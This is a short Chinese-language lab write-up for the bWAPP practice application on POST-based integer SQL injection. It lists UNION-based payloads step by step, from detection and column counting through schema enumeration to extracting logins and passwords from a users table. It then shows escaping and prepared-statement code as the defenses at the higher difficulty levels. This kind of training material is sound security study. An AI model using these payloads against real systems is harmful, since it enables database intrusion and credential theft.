bWAPP-SQLInjectionPost2

POST整型注入

判断是否存在注入

1+and+1=1#
1+and+1=2#

判断注入字段个数

1+order+by+7#
1+order+by+8#

判断注入字段位置

0+union+select+1,2,3,4,5,6,7#

获取数据库信息

0+union+select+1,database(),version(),user(),5,6,7#

获取表名

0+union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3,4,5,6,7#

获取列名

0+union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='users'+and+table_schema=database()),3,4,5,6,7#

获取信息

0+union+select+1,(select+group_concat(login,'-',password,'-')+from+users),3,4,5,6,7#

演练

low

0+union+select+1,(select+group_concat(login,'-',password,'-')+from+users),3,4,5,6,7#

mid

使用mysql_real_escape_string

function sqli_check_2($data)
{
   
    return mysql_real_escape_string($data);
    
}

high

使用预处理语句防止注入

    $id = $_POST["movie"];

    $sql = "SELECT title, release_year, genre, main_character, imdb FROM movies WHERE id =?";
    if($stmt = $link->prepare($sql)) 
    // if($stmt = mysqli_prepare($link, $sql))                
    {

        // Binds the parameters for markers
        $stmt->bind_param("s", $id);
        // mysqli_stmt_bind_param($stmt, "s", $id);

        // Executes the query
        $stmt->execute();
        // mysqli_stmt_execute($stmt);

        // Binds the result variables
        $stmt->bind_result($title, $release_year, $genre, $main_character, $imdb);
        // mysqli_stmt_bind_result($stmt, $title, $release_year, $genre, $main_character, $imdb);

        // Stores the result, necessary to count the number of rows
        $stmt->store_result();      
        // mysqli_stmt_store_result($stmt);

        // Prints the number of rows
        // printf("Number of rows: %d.\n", mysqli_stmt_num_rows($stmt));
        // printf("Number of rows: %d.\n", $stmt->num_rows);      
    }